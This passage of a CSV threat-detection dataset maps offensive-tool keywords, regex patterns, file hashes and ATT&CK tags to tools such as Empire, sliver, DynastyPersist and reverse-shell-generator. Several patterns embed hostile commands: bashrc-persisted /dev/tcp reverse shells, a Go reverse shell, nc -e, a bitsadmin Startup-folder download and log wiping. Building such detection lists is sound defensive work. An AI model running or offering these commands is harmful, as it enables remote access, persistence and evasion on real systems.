Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*echo ""Nothing to see here ... "" > /var/log/kern.log*",".{0,1000}echo\s\""Nothing\sto\ssee\shere\s\.\.\.\s\""\s\>\s\/var\/log\/kern\.log.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*echo * > \\.\pipe\*",".{0,1000}echo\s.{0,1000}\s\>\s\\\\\.\\pipe\\.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*echo */24 | dnsx -silent -resp-only -ptr*",".{0,1000}echo\s.{0,1000}\/24\s\|\sdnsx\s\-silent\s\-resp\-only\s\-ptr.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*echo 123 > c:\windows\temp\test.txt*",".{0,1000}echo\s123\s\>\sc\:\\windows\\temp\\test\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET 
formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*echo '8.8.8.8' | hakrevdns*",".{0,1000}echo\s\'8\.8\.8\.8\'\s\|\shakrevdns.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*echo 'alias cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'alias\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*echo bitsadmin /transfer Packages /download /priority foreground %a% ""%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Winupdate.exe*",".{0,1000}echo\sbitsadmin\s\/transfer\sPackages\s\/download\s\/priority\sforeground\s\%a\%\s\""\%USERPROFILE\%\\AppData\\Roaming\\Microsoft\\Windows\\Start\sMenu\\Programs\\Startup\\Winupdate\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and 
even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echo 'find cat=/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'' >> */.bashrc* ",".{0,1000}echo\s\'find\scat\=\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/.{0,1000}\/.{0,1000}\s0\>\&1\'\'\s\>\>\s.{0,1000}\/\.bashrc.{0,1000}\s","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*echo 'import os'*echo*os.system(""nc -e sh*'* > /tmp/*",".{0,1000}echo\s\'import\sos\'.{0,1000}echo.{0,1000}os\.system\(\""nc\s\-e\ssh.{0,1000}\'.{0,1000}\s\>\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo -n 'cmd /c start rundll32 *.dll* | base64*",".{0,1000}echo\s\-n\s\'cmd\s\/c\sstart\srundll32\s.{0,1000}\.dll.{0,1000}\s\|\sbase64.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Generate EncodedCommand","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*echo 'package 
main;*net.Dial(""tcp""*exec.Command(""/bin/bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""/bin/sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""\/bin\/sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""bash"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""bash\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""cmd"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""cmd\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""powershell"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""powershell\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""pwsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""pwsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - 
TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""sh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""sh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'package main;*net.Dial(""tcp""*exec.Command(""zsh"")*cmd.Stdin=*cmd.Stdout=*cmd.Stderr=*cmd.Run()*' > /tmp/*.go*go run /tmp/*",".{0,1000}echo\s\'package\smain\;.{0,1000}net\.Dial\(\""tcp\"".{0,1000}exec\.Command\(\""zsh\""\).{0,1000}cmd\.Stdin\=.{0,1000}cmd\.Stdout\=.{0,1000}cmd\.Stderr\=.{0,1000}cmd\.Run\(\).{0,1000}\'\s\>\s\/tmp\/.{0,1000}\.go.{0,1000}go\srun\s\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*echo 'PEzor!!*",".{0,1000}echo\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*echo powershell -command ""start Winupdate.exe"" >>*.bat*",".{0,1000}echo\spowershell\s\-command\s\""start\sWinupdate\.exe\""\s\>\>.{0,1000}\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echo UAC.ShellExecute *cmd.exe*",".{0,1000}echo\sUAC\.ShellExecute\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*echoac-poc-main*",".{0,1000}echoac\-poc\-main.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - 
TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","135","26","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z" "*echowrecker*",".{0,1000}echowrecker.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols) for FreeBSD OpenBSD 3.1 OpenBSD 3.2 (with a non-executable stack zomg) and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*ecryptfs2john.py*",".{0,1000}ecryptfs2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ecs_task_def_data/all_task_def.txt*",".{0,1000}ecs_task_def_data\/all_task_def\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa*",".{0,1000}ed09e2c53b898d79b81b5aa96dfc9b5ed696b34491eef7b5fefe9fb7ed1cbaaa.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - 
TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470*",".{0,1000}ed0e2694b307d3510c102a4a5687523d0c72b8efba9dc256f493555639a3d470.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84*",".{0,1000}ed0ee202bacea249b3d4563c0262501587434b25fc8b754c17829c8f4a64ad84.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Ed1s0nZ/cool/*",".{0,1000}Ed1s0nZ\/cool\/.{0,1000}","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","683","115","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" "*ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56*",".{0,1000}ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local 
computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947*",".{0,1000}ed3e2cf7fe3797b0ec87b74568628f8a4d7ac1c4c5a29c6e169599ded4d1d947.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb*",".{0,1000}ed4d66eac260c54457ea1b9fa50be035dc89b32e7a318bff1296606413f25cbb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" 
"*ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d*",".{0,1000}ed565cd47f1e75dc1c53043d03631809f64c091293d10fb26f272ff74d419a6d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3*",".{0,1000}ed68e081f359726e140c31e96c92da4aa363a976569f4f9357f73f738d534dd3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235*",".{0,1000}ed696e567323b56a31408da5f6e12181ae0740bec1b23fc9be2817e51cf13235.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1*",".{0,1000}ed72a475f9c8bb454e36a97155172424cd9892cbeba30bb6fc53cad973767fd1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*ED83E265-D48E-4B0D-8C22-D9D0A67C78F2*",".{0,1000}ED83E265\-D48E\-4B0D\-8C22\-D9D0A67C78F2.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c*",".{0,1000}ed85a47316a693661dd964ef58efb31bbe5ed97d2f9560021a220bbb912a9c2c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" 
